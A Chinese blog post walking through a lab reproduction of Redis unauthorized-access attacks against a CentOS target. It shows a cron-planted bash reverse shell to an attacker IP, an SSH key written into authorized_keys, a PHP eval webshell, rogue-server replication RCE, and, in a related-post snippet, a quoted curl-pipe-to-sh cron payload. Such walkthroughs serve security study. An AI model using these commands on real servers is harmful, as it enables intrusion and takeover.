Redis服务入侵记

已于 2022-08-22 14:14:46 修改
阅读量858 收藏 1
点赞数 1
文章标签: redis 数据库 java
于 2022-08-22 14:10:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32262243/article/details/126464612
版权

0x00 简要说明

百度百科:Redis(Remote Dictionary Server),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
Redis因配置不当可导致攻击者直接获取到服务器的权限。
利用条件:redis以root身份运行,未授权访问,弱口令或者口令泄露等

环境准备:

测试环境IP
Kali192.168.31.56
靶机(CentOS 7)192.168.31.54

0x01 CentOS 7安装Redis

# 安装gcc
[root@localhost ~]# yum install -y gcc
# 下载解压redis安装包
[root@localhost ~]# wget http://download.redis.io/releases/redis-5.0.0.tar.gz
[root@localhost ~]# tar xvf redis-5.0.0.tar.gz
# 编译并执行安装,指定安装目录为/usr/local/redis
[root@localhost ~]# cd redis-5.0.0/
[root@localhost redis-5.0.0]#  make && make install PREFIX=/usr/local/redis
# 启动redis服务并保持后台运行
[root@localhost redis-5.0.0]#  cd /usr/local/redis/bin/
[root@localhost bin]# ./redis-server &
# 关闭保护模式
[root@localhost bin]# ./redis-cli 
127.0.0.1:6379> config set protected-mode no

0x02 通过计划任务反弹shell

利用条件:
redis以root身份运行,未授权访问或授权口令已知
在kali中通过redis-cli -h 192.168.31.54 -p 6379连接到redis,输入以下指令利用crontab反弹shell

# cron表达式格式:{秒数} {分钟} {小时} {日期} {月份} {星期} {年份(可为空)} 命令
# 每分钟执行一次echo "haha":* * * * * echo "haha"
192.168.31.54:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.31.56/4444 0>&1\n"
# 设置目录为/var/spool/cron/
192.168.31.54:6379> config set dir /var/spool/cron/
# 设置文件名为root
192.168.31.54:6379> config set dbfilename root
# 保存快照到本地
192.168.31.54:6379> save

kali中打开一个新的命令行窗口执行nc -lvnp 4444进行监听,过一会儿就能接收到反弹回来的shell:

由于redis的压缩储存机制,在某些情况下会因为反弹shell的指令被压缩,从而导致反弹shell失败:

192.168.31.54:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.31.56/4444 0>&1\n"
192.168.31.54:6379> save

[root@localhost  ~]# cat /var/spool/cron/root 
* * * * * bash -i &> /dev/tcp/192.168.31.54@/4  0>&1

192.168.31.54:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.31.56/4444 0>&1\n"
192.168.31.54:6379> save

[root@localhost  ~]# cat /var/spool/cron/root 
* * * * * bash -i &> /dev/tcp/192.168.100.99/4444 0>&1

当运行redis的用户为普通用户时,会无法出现切换目录失败的情况:

config set dir /var/spool/cron
(error) ERR Changing directory: Permission denied

0x03 通过写入SSH公钥远程连接

利用条件:
redis以root身份运行,未授权访问或授权口令已知,服务器开放SSH服务且允许密钥登录

在kali中使用ssh-keygen -t rsa生成密钥:

将生成的公钥文件保存到本地:

┌──(kali@kali)-[/home/kali]
└─# (echo -e "\n\n"; cat /home/kali/.ssh/id_rsa.pub; echo -e "\n\n") > kali

将文件写入redis进行利用:

# 将上一步生成的kali文件写入redis并设置键的值为kali
┌──(kali@kali)-[/home/kali]
└─# cat kali | redis-cli -h 192.168.31.54 -p 6379 -x set kali

# 连接redis,并将公钥文件写入/root/.ssh/authorized_keys中
┌──(kali@kali)-[/home/kali]
└─# redis-cli -h 192.168.31.54 -p 6379
192.168.31.54:6379> config set dir /root/.ssh/
192.168.31.54:6379> config set dbfilename authorized_keys
192.168.31.54:6379> save

使用密钥进行登录 

┌──(kali@kali)-[/home/kali]
└─# ssh -i /root/.ssh/id_rsa root@192.168.31.54

 0x04 通过写入文件获取webshell

利用条件:未授权访问或授权口令已知,服务器开着WEB服务且WEB目录路径已知
倘若服务器运行着LAMP/LNMP服务,且已知工作目录为/var/www/html/,可通过以下指令写入webshell,或参考写入SSH公钥的过程写入木马文件:

config set dir /var/www/html/
config set dbfilename shell.php
set x "<?php @eval($_POST['test']);?>"
save

0x05 通过主从复制获取shell

利用条件:
未授权访问或授权口令已知,Redis <=5.0.5
参考地址:https://github.com/n0b0dyCN/redis-rogue-server
使用方法

python3 redis-rogue-server.py --rhost <target address> --rport <target port> --lhost <vps address> --lport <vps port>

参数说明:

 –rpasswd 如果目标Redis服务开启了认证功能,可以通过该选项指定密码
–rhost 目标redis服务IP
–rport 目标redis服务端口,默认为6379
–lhost vps的IP地址
–lport vps的端口,默认为21000

┌──(kali@kali)-[/home/kali]
└─# git clone //github.com/n0b0dyCN/redis-rogue-server.git

┌──(kali@kali)-[/home/kali]
└─# cd redis-rogue-server

┌──(kali@kali)-[/home/kali]
└─# python3 redis-rogue-server.py --rhost 192.168.31.54 --lhost 192.168.31.56

Kim同学
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Redis Rogue Server: 创新的Redis安全测试工具
gitblog_00067的博客
04-18 359
Redis Rogue Server: 创新的Redis安全测试工具 项目地址:https://gitcode.com/Dliv3/redis-rogue-server 项目简介 Redis Rogue Server 是一个开源项目,由开发者 Dliv3 创建,旨在帮助系统管理员和安全专家进行红队(Red Team)操作和渗透测试,模拟恶意Redis服务器行为。通过这个工具,你可以测试你的应用...
Redis详解
CodeSheep1的博客
11-27 474
Java中运用RedisJedis1. Jedis 是 Redis 官方首选的 Java 客户端开发包。2.jedis的相关jar包3.Jedis对象的使用1)创建Jedis对象2)使用Jedis对象3)关闭Jedis对象4.Jedis对Redis中key的操作5.Jedis对Redis中string的操作6.Jedis对Redis中hash的操作7.Jedis对Redis中其他类型的操作8.Jedis处理Redis中的事务9.JedisPool的使用(连接池)1)创建JedisPool2)使用JedisP
Suricata-Redis
06-12
Suricata-Redis ##Concepts 的目标是在 Redis(noSQL 数据库)中录和处理 suricata 的事件 ##NDH 2K14 代码已在 NDH 2014
血的教训---入侵redis并远程控制你的机器场景复现
guijianchouxyz的博客
10-26 6885
不怕服务安装部署,就怕上任运维瞎部署防不胜防,全是泪,全是血
Redis被攻击纪实
最新发布
程序员青菜学厨记
11-08 439
1、2017年时候测试环境安装的是Redis4.0版本(或者更低,不太清了),默认安装6379端口可以远程访问,然后被黑了,被人家做为挖矿机,他们太狠了,一定要把我CPU耗尽,搞得别的程序都跑不了(这样别人不就发现了吗,不能控制CPU的占用情况吗?上周新来的同事分享Redis的原理和机制,想起2017年的时候测试环境Redis被攻击,最后只能重新安装服务器,今天试验一把利用Redis漏洞进行攻击,只有理解了别人是怎么攻击的,才能更好地进行防范。注:忘截屏了,重启了Redis,那个注入的key找不到了。
Redis未授权访问漏洞搭建复现
m0_58595840的博客
01-05 2754
Redis未授权访问漏洞利用方式总结(含靶场搭建)
redis】could not connect to Redis at 127.0.0.1:6379: Connection refused
weixin_61876117的博客
09-21 1467
redis启动
一次Ubuntu服务器被黑经历
01-10
很可能服务被侵入了!!! 寻找线索 一开始我是完全懵逼的状态的,Linux不是很熟悉,只会简单的命令,安装部署redis,mongo这些东西。好吧,只能百度Google了! 寻找可疑进程 ps -ef 然而结果看起来一点头绪都没,...
小豪商城服务器资源
07-04
6. **缓存技术**:Redis、Memcached等缓存服务用于存储频繁访问的数据,减轻数据库压力,提升响应速度。小豪商城的热门商品、用户会话等可能都会进行缓存处理。 7. **负载均衡**:通过负载均衡器(如HAProxy、Nginx...
完整版聊天服务器.e.rar
04-03
1.3 数据存储:为了快速响应查询和保持数据一致性,聊天服务器会采用高性能的数据库系统,如MySQL、MongoDB或Redis,用于存储用户信息、会话录等。 二、聊天服务器核心功能实现 2.1 用户注册与认证:通过安全的...
Sandstorm004:沙尘暴服务
03-20
可能使用的是关系型数据库(如MySQL、PostgreSQL)或者非关系型数据库(如MongoDB、Cassandra),并实施数据缓存策略(如Redis)来提升性能。 6. **安全防护**:服务器安全是关键,可能包含防火墙、入侵检测系统、...
【vulhub漏洞复现】redis 4-unacc 未授权访问漏洞
RexHa的博客
03-03 4657
一、漏洞详情Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。
redis:Could not connect to Redis at 127.0.0.1:6379: Connection refused错误解析
渐行渐远
07-10 8万+
1.错误信息思考: 根据错误信息的字面意思,可以知道,redis-cli客户端程序,通过ip127.0.0.1,端口6379与redis服务器建立连接失败。说明当我们调用redis-cli时,默认是用本地回环地址去与服务器端建立连接。 2.解决问题思路: 服务器程序会在监听一个套接字(IP+端口号),等待客户端的连接。一般运行服务器程序的时候,都会加载一个配置文件。 redis服务器也会读取一个配置文件。 如果不知道配置文件在哪里,可以使用: which redis.conf #或者 whe
redis非授权访问漏洞
weixin_43995159的博客
11-29 1206
复现了三种redis未授权登录的场景。 1.通过redis写入计划任务,取得反弹shell。 2.通过redis写入一句话木马,取得shell。 3.通过redis写入ssh公钥,实现ssh无密码连接。
redis被黑客入侵
程序员陆通
02-12 1473
[root@iZ112fail84Z home]# redis-cli 127.0.0.1:6379> keys * 1) “crackit” 127.0.0.1:6379> get crackit “\n\n\n*/5 * * * * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh\n\n\n\n”这个程序每5分钟执行一个shell
一次Redis入侵(被黑)处理过程
nelson的博客
05-22 3276
通常作为一名后端程序员,并没有系统的学习过关于服务器安防相关的知识,遇到服务器被黑的情况往往比较迷茫,不知道从何下手。服务器可能遭受的攻击多种多样,以下主要讲述的是我本次遇到的一次服务器被黑客拿来当矿机的处理过程。 攻击的发现 之所以发现服务器被攻击了是因为有用户反馈系统卡顿非常严重,我知道一般用户反馈描述的那个时间点不应该会有这么高的延迟的,所以就登录服务器查看以下CPU等资源的消耗情况。(挖矿...
Redis没有加密漏洞导致服务器被入侵以及解决的过程
lingmeng447的专栏
04-30 796
一次Redis漏洞导致服务器被入侵以及解决的过程 orisonchan关注 2018.08.09 23:41:20字数 781阅读 1,281 其实这个问题在网上都有说明。然而因为本人是开发出身,运维方面比较欠缺,所以才会遇到此问题,遂录下来,以此为戒。 被入侵现象 服务器多了很多莫名其妙的操作,根据查看操作录命令history得到。 服务器会莫名其妙重启。 经常ssh免密登录失效。 apt-get使用报错。 报错log如下: insserv: warning: script
利用redis漏洞入侵服务
yaoxiaofeng_000的专栏
04-12 1255
目标机:172.16.20.173登录机:172.16.20.55假设172.16.20.173 开放6379端口,并且暴露在公网上没有设置密码,嘿嘿,那么你就知道后面发生的事情了。首先把自己的公钥写到一个临时文件中,注意前后要加换行,不然会导致找不到对应的秘钥# $ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") &gt; foo.txt# re...
韦玮:解决Ubuntu的root账号无法登录SSH问题-Permission denied, please try again.
热门推荐
weiwei_pig的专栏
03-22 9万+
韦玮:解决Ubuntu的root账号无法登录SSH问题-Permission denied, please try again.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kim同学

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值